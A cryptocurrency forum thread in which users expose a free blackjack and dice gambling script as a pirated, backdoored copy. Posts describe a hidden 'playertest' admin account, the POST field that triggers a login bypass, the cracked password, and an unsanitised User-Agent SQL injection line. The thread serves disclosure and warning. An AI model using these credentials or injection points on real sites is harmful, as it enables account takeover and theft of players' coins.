|
Title: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 07:55:18 AM CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack (https://github.com/felinegambler/CryptoBlackJack) CryptoDice https://github.com/felinegambler/CryptoDice (https://github.com/felinegambler/CryptoDice) Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across). Both scripts support all Bitcoin based cryptocurrencies. if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com Please Read due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough. Have Fun! Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: TechnoBibble on December 31, 2014, 09:23:03 AM CryptoBlackJack https://github.com/felinegambler/CryptoBlackJack (https://github.com/felinegambler/CryptoBlackJack) CryptoDice https://github.com/felinegambler/CryptoDice (https://github.com/felinegambler/CryptoDice) Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across). Both scripts support all Bitcoin based cryptocurrencies. if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com Please Read due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough. Have Fun! Thank You for the new release, I will Audit these scripts when I get home from work tonight. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 11:21:48 AM Thanks. I can assure you there is nothing hidden. It would be good to have an independent audit of the software.
Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: Muhammed Zakir on December 31, 2014, 11:30:03 AM Hello! Can you extract the dice-rolling script from this and send it to me? I can give some BTC if you want. :)
~~MZ~~ Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 11:32:50 AM Can you show some screenshots? Before downloading and installing, I want to see it :D
But it's not the script from Johny1976? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: Muhammed Zakir on December 31, 2014, 11:43:59 AM But it's not the script from Johny1976? Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. :) ~~MZ~~ Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 11:54:21 AM Can you show some screenshots? Before downloading and installing, I want to see it :D You can use Github for demos. They offer making sites for the Github repos. But it's not the script from Johny1976? Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. :) ~~MZ~~ Hi Muhammed, where can I find the option for the demo? It can also be a rip-off of Johnys script. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 12:01:26 PM It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents. Anyway... Its now on github for people to share and distribute freely. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: Sam the Man on December 31, 2014, 12:05:15 PM Working perfectly for me so far.
I was wondering though are there going to be any theme updates? thanks. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 12:09:48 PM Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Hi, I am working on a couple which will be released in the next week :) Thank You for your positive feedback. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 12:15:20 PM Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Hi, I am working on a couple which will be released in the next week :) Thank You for your positive feedback. I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script? @felinegambler could You do a hold'em script? against payment without a backdoor :) Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 12:19:26 PM Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Hi, I am working on a couple which will be released in the next week :) Thank You for your positive feedback. I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script? @felinegambler could You do a hold'em script? against payment without a backdoor :) Yeah of course, Its something a started a while back which I been meaning to finish. The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code. I will get to work on the Hold'Em game tonight, As personally its my favorite game. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 12:21:19 PM It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them. I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents. Anyway... Its now on github for people to share and distribute freely. Thanks! Nice work! Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: Muhammed Zakir on December 31, 2014, 12:21:26 PM Hi Muhammed, where can I find the option for the demo? It can also be a rip-off of Johnys script. Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! :) It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them. I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents. Anyway... Its now on github for people to share and distribute freely. Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! :) ~~MZ~~ Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 12:38:14 PM Hi Muhammed, where can I find the option for the demo? It can also be a rip-off of Johnys script. Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! :) It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them. I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents. Anyway... Its now on github for people to share and distribute freely. Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! :) ~~MZ~~ Of course, I will get some pics when I am back home tonight and put them on this thread. Thanks for the github.io link, I will see if I can upload a demo also. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 12:47:51 PM Working perfectly for me so far. I was wondering though are there going to be any theme updates? thanks. Hi, I am working on a couple which will be released in the next week :) Thank You for your positive feedback. I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script? @felinegambler could You do a hold'em script? against payment without a backdoor :) Yeah of course, Its something a started a while back which I been meaning to finish. The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code. I will get to work on the Hold'Em game tonight, As personally its my favorite game. thanks for the good work. may I PM you regarding the holdem? because I have my own holdem idea and would like to know if You can/would do it and I sure wanna pay for it. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 01:13:08 PM of course, send me your suggestions. I will see if I can implement them.
Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: felinegambler on December 31, 2014, 01:39:35 PM Problem
Whist installing the blackjack game I have noticed a problem with the login, I wouldnt suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: cloverme on December 31, 2014, 04:18:06 PM I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.
Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack. Install from the OP Code: if (isset($_GET['checkCons'])) {Install from official Coinjack: Code: if (isset($_GET['checkCons'])) {Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: TechnoBibble on December 31, 2014, 04:24:43 PM I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.
I will post my findings soon. Backdoor Found CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part. Code: DROP TABLE IF EXISTS `ga_players`; When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php) Surprise Surprise if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', ''); Code: if (!empty($_POST['ga_playertest'])) {Everybody should remove this ASAP. You don't know what else could be hidden in here. I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know. cloverme, I am assuming you have the original game? What line is meant to be in login.php? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 04:25:46 PM I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware. Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack. Install from the OP Code: if (isset($_GET['checkCons'])) {Install from official Coinjack: Code: if (isset($_GET['checkCons'])) {As I said...but he meant that he fixed some bugs. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 04:29:27 PM I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware. are there many open source gambling scripts with backdoors on github? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: johny1976 on December 31, 2014, 04:31:24 PM due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough. And it's also copyrighted. Please stop sharing our scripts for free. SCAMMER I recommend everyone not to download this backdoored versions of our software. These are not even the latest versions and contain security bugs. If you buy full license from us, you'll get free lifetime support + updates. See my signature. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 04:36:05 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?
Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 04:37:25 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust? So true...best option: develop your own script! Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: cloverme on December 31, 2014, 04:38:13 PM As I said...but he meant that he fixed some bugs. Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not, my advice is to avoid the pirate copy and just buy the script from johny if you want it. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LOBSTER on December 31, 2014, 04:39:42 PM As I said...but he meant that he fixed some bugs. Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not. At first he should tell us which bugs are in the script and how he fixed it. That would help to trust and retrace. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: TechnoBibble on December 31, 2014, 04:42:12 PM For Your Information, I have just found a backdoor in /admin/login.php
Please see this post (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462 (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462)) Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 04:43:10 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust? So true...best option: develop your own script! I cant code :(( so what should I do? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: cloverme on December 31, 2014, 04:44:24 PM Everybody should remove this ASAP. You don't know what else could be hidden in here. I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know. cloverme, I am assuming you have the original game? What line is meant to be in login.php? I do have the licensed game yes, none of that code is in there, so it looks like you found the exploit in scammers attempt. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: johny1976 on December 31, 2014, 04:44:56 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust? Just compare his modified admin login script with our original: (original) https://i.imgur.com/NjX9IW5.png (backdoored) https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php This should help you guys make clear who is the scammer here. :-) Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: cloverme on December 31, 2014, 04:47:24 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust? Just compare his modified admin login script with our original: (original) https://i.imgur.com/NjX9IW5.png (backdoored) https://i.imgur.com/NjX9IW5.png This should help you guys make clear who is the scammer here. :-) You posted the same image by accident. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: johny1976 on December 31, 2014, 04:47:43 PM confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust? Just compare his modified admin login script with our original: (original) https://i.imgur.com/NjX9IW5.png (backdoored) https://i.imgur.com/NjX9IW5.png This should help you guys make clear who is the scammer here. :-) You posted the same image by accident. Thank you, corrected. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: redsn0w on December 31, 2014, 04:56:06 PM Scam accusation against you : https://bitcointalk.org/index.php?topic=909282.0
Please try to resolve it ( I've left you a negative trust for only a questio of security , when you will resolve this situation I will remove it). Thanks for the attention , have a great day . Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: TechnoBibble on December 31, 2014, 04:58:21 PM I have posted a scam report in "scam accusations"
Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0) johny1976, Do you have a link to your version that I can put in the solution? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: redsn0w on December 31, 2014, 05:00:08 PM I have posted a scam report in "scam accusations" Thanks I've seen it. Now I suggest to leave a negative trust to the OP ( for a security reason , it will remove when all the situation will be clarified).Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0) Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: johny1976 on December 31, 2014, 05:02:01 PM I have posted a scam report in "scam accusations" Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0) johny1976, Do you have a link to your version that I can put in the solution? https://bitcointalk.org/index.php?topic=718910.0 - CoinJack https://bitcointalk.org/index.php?topic=507515.0 - CoinDice It's also in my signature. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: TechnoBibble on December 31, 2014, 05:06:03 PM I have posted a scam report in "scam accusations" Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0) johny1976, Do you have a link to your version that I can put in the solution? https://bitcointalk.org/index.php?topic=718910.0 - CoinJack https://bitcointalk.org/index.php?topic=507515.0 - CoinDice It's also in my signature. lol, did not see in your sig, I tend to ignore them ;) added to post. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on December 31, 2014, 05:09:54 PM but to be frank Johnny has the worst support for his Black Jack script IMO please see here
https://bitcointalk.org/index.php?topic=718910.0 (https://bitcointalk.org/index.php?topic=718910.0) Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: LilGhost on December 31, 2014, 06:07:56 PM The admin login page is vulnerable to SQL injection.
Code: mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");This line is vulnerable to SQL injection if an attacker sends a custom user agent. Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: MarkMJ on July 06, 2015, 05:13:47 PM Just test the CryptoBlackJack
Have 3 backdoors but good for making a project Sorry for user that drop this script. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: elm on July 06, 2015, 05:44:14 PM Just test the CryptoBlackJack Have 3 backdoors but good for making a project Sorry for user that drop this script. are those 3 backdoors enough to get my coins? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: myfirst on July 06, 2015, 06:29:34 PM The admin login page is vulnerable to SQL injection. Code: mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");This line is vulnerable to SQL injection if an attacker sends a custom user agent. Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first. Is this issue specifically with this pirated copy or with the original as well? Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: johny1976 on July 06, 2015, 08:41:56 PM The admin login page is vulnerable to SQL injection. Code: mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");This line is vulnerable to SQL injection if an attacker sends a custom user agent. Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first. Is this issue specifically with this pirated copy or with the original as well? Only this pirated copy, in our (original) version that is protected. Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts Post by: ca333 on November 11, 2015, 08:02:02 AM I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters. I will post my findings soon. Backdoor Found CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part. Code: DROP TABLE IF EXISTS `ga_players`; When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php) Surprise Surprise if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', ''); Code: if (!empty($_POST['ga_playertest'])) {Everybody should remove this ASAP. You don't know what else could be hidden in here. I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know. cloverme, I am assuming you have the original game? What line is meant to be in login.php? i cracked the md5 hash: 6d2aff483952d904179ca0c8c536a2c7:playertest1 I advice anybody to USE THE ORIGINAL version from johny1976 (https://bitcointalk.org/index.php?action=profile;u=143958) because the posted scripts have many backdoors and they are pirated copies with NO licence... |